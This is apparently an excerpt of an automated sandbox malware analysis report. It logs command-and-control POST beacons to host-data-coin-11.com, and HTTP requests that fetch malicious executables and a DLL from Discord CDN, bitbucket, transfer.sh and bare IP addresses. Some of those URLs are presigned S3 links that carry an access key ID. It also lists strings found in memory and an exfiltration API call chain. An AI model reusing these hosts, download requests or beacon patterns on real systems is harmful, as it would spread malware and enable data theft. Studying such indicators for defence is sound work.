                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwpbyl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lbhapead.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gvmtgcjw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ylridfpsql.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hxktrih.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://plxyaqocf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kpbmili.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ucoqtvyd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pvmkcaiq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://brlvnaq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://chmbugnp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qnhrcwsu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jiwvmdi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xippeeyeyr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfseu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mrlefqqc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: GET /files/2264_1640622147_2258.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yqndvhfvew.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prmhflof.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://risngapv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ujyivo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jmtkjkpl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fxnyg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://moteqo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kuwxcr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://itvtw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: GET /stlr/maps.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.243.44.128
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bkepfdarq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qqnjujtc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wjossdwse.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pwwyvihpo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://veitjk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://htkfphhu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uhsewixtmk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cpvpnqem.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://davmsaybuv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upfuvgjpoj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pauhpwmqnp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lhtwdpi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 237Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cykpq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qeboy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: host-data-coin-11.com
                        Source: Joe Sandbox ViewASN Name: PINDC-ASRU PINDC-ASRU
                        Source: Joe Sandbox ViewIP Address: 5.188.89.48 5.188.89.48
                        Source: Joe Sandbox ViewIP Address: 188.166.28.199 188.166.28.199
                        Source: global trafficTCP traffic: 192.168.2.3:49812 -> 185.7.214.171:8080
                        Source: global trafficTCP traffic: 192.168.2.3:49851 -> 86.107.197.138:38133
                        Source: svchost.exe, 00000011.00000002.416450939.0000023EEF2E9000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: svchost.exe, 00000011.00000002.416450939.0000023EEF2E9000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                        Source: svchost.exe, 00000011.00000003.389450224.0000023EEF978000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                        Source: svchost.exe, 00000005.00000002.309180271.000001AF99013000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                        Source: svchost.exe, 00000002.00000002.554676396.0000023727642000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                        Source: svchost.exe, 00000002.00000002.554676396.0000023727642000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                        Source: EKNYUKXB.25.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: svchost.exe, 00000002.00000002.554676396.0000023727642000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                        Source: A3D.exe, 0000001B.00000002.482088849.0000000003AC1000.00000004.00000001.sdmp, A3D.exe, 00000027.00000000.470989961.0000000000402000.00000040.00000001.sdmp, BC9C.exe.10.drString found in binary or memory: https://api.ip.sb/ip
                        Source: svchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                        Source: svchost.exe, 00000002.00000002.554676396.0000023727642000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                        Source: EKNYUKXB.25.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: svchost.exe, 00000002.00000002.554676396.0000023727642000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                        Source: svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                        Source: svchost.exe, 00000005.00000002.309299121.000001AF9905C000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                        Source: svchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                        Source: svchost.exe, 00000005.00000002.309269221.000001AF9903D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                        Source: svchost.exe, 00000005.00000002.309299121.000001AF9905C000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                        Source: svchost.exe, 00000005.00000002.309313997.000001AF9906A000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308261175.000001AF99068000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                        Source: svchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                        Source: svchost.exe, 00000005.00000002.309299121.000001AF9905C000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                        Source: svchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                        Source: svchost.exe, 00000005.00000002.309269221.000001AF9903D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                        Source: svchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                        Source: svchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                        Source: svchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                        Source: svchost.exe, 00000005.00000003.286088420.000001AF99031000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                        Source: svchost.exe, 00000005.00000003.308466648.000001AF99040000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308542792.000001AF99041000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.309276445.000001AF99042000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                        Source: svchost.exe, 00000005.00000003.308466648.000001AF99040000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308542792.000001AF99041000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.309276445.000001AF99042000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                        Source: svchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                        Source: svchost.exe, 00000005.00000002.309299121.000001AF9905C000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308466648.000001AF99040000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                        Source: svchost.exe, 00000005.00000003.286088420.000001AF99031000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
                        Source: svchost.exe, 00000011.00000003.389450224.0000023EEF978000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                        Source: EKNYUKXB.25.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: EKNYUKXB.25.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: EKNYUKXB.25.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                        Source: svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                        Source: svchost.exe, 00000005.00000002.309299121.000001AF9905C000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308426739.000001AF9905A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                        Source: svchost.exe, 00000005.00000003.308279245.000001AF99049000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                        Source: svchost.exe, 00000005.00000003.308361447.000001AF99061000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                        Source: svchost.exe, 00000005.00000002.309269221.000001AF9903D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                        Source: svchost.exe, 00000005.00000003.286088420.000001AF99031000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                        Source: EKNYUKXB.25.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                        Source: EKNYUKXB.25.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: svchost.exe, 00000005.00000002.309269221.000001AF9903D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                        Source: svchost.exe, 00000005.00000002.309269221.000001AF9903D000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.309180271.000001AF99013000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                        Source: svchost.exe, 00000005.00000003.286088420.000001AF99031000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                        Source: svchost.exe, 00000005.00000003.308466648.000001AF99040000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308528035.000001AF99045000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                        Source: svchost.exe, 00000005.00000003.286088420.000001AF99031000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                        Source: svchost.exe, 00000005.00000002.309262853.000001AF9903A000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.286088420.000001AF99031000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                        Source: svchost.exe, 00000005.00000002.309290210.000001AF9904E000.00000004.00000001.sdmp, svchost.exe, 00000005.00000003.308279245.000001AF99049000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                        Source: svchost.exe, 00000011.00000003.389450224.0000023EEF978000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                        Source: svchost.exe, 00000011.00000003.389450224.0000023EEF978000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                        Source: EKNYUKXB.25.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: svchost.exe, 00000011.00000003.390515077.0000023EEF97D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.390700975.0000023EEF99F000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.390647924.0000023EEFE02000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.390626720.0000023EEFE19000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.390587865.0000023EEFE19000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                        Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,GetKeyNameTextA,GetKeyNameTextA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                        Source: global trafficHTTP traffic detected: GET /attachments/812323288264605709/924475642190397461/Hairstyle.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                        Source: global trafficHTTP traffic detected: GET /get/s3SPeb/A.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: transfer.sh
                        Source: global trafficHTTP traffic detected: GET /evangelioshas/2/downloads/1.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
                        Source: global trafficHTTP traffic detected: GET /31872cda-a479-44e8-b865-70ba18aaec67/downloads/3d8e64d7-3a3a-4f85-bde4-fe88e5a8d088/1.exe?Signature=LYct25MsH9V1aszIuuA3S95qNtU%3D&Expires=1640659361&AWSAccessKeyId=AKIA6KOSE3BNA7WTAGHW&versionId=BtKtP2E0q4PQvFUo.dOlKBb5196B2WYw&response-content-disposition=attachment%3B%20filename%3D%221.exe%22 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
                        Source: global trafficHTTP traffic detected: GET /erkermacher/eclipse/downloads/Original.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
                        Source: global trafficHTTP traffic detected: GET /931d4d65-0999-46ef-a088-c6ca413195e0/downloads/d4407d09-c074-4208-91cf-dd06968366b5/Original.exe?Signature=cP199pYfJwRSEMBSNgZo4gpVPkI%3D&Expires=1640659850&AWSAccessKeyId=AKIA6KOSE3BNA7WTAGHW&versionId=qHsyz7Z0XxrBSgIUQ7vNQcW7uixcA2m1&response-content-disposition=attachment%3B%20filename%3D%22Original.exe%22 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
                        Source: global trafficHTTP traffic detected: GET /trustedrootdev/file/downloads/SystemInjectSvHostAllocation.jpeg HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /attachments/925145879403446292/925145901322879006/top.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
                        Source: global trafficHTTP traffic detected: GET /x009B.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: downloafilesaccess.ddns.net
                        Source: global trafficHTTP traffic detected: GET /georgindesign/desingner/downloads/Update.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /georgindesign/desingner/downloads/Updater.exe HTTP/1.1Host: bitbucket.org
                        Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
                        Source: global trafficHTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                        Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                        Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                        Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                        Source: global trafficHTTP traffic detected: GET /tratata.php HTTP/1.1Host: file-file-host4.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqlite3.dll HTTP/1.1Host: file-file-host4.comCache-Control: no-cacheCookie: PHPSESSID=n6c9ok5pr9f3mq8uid55nirqfv
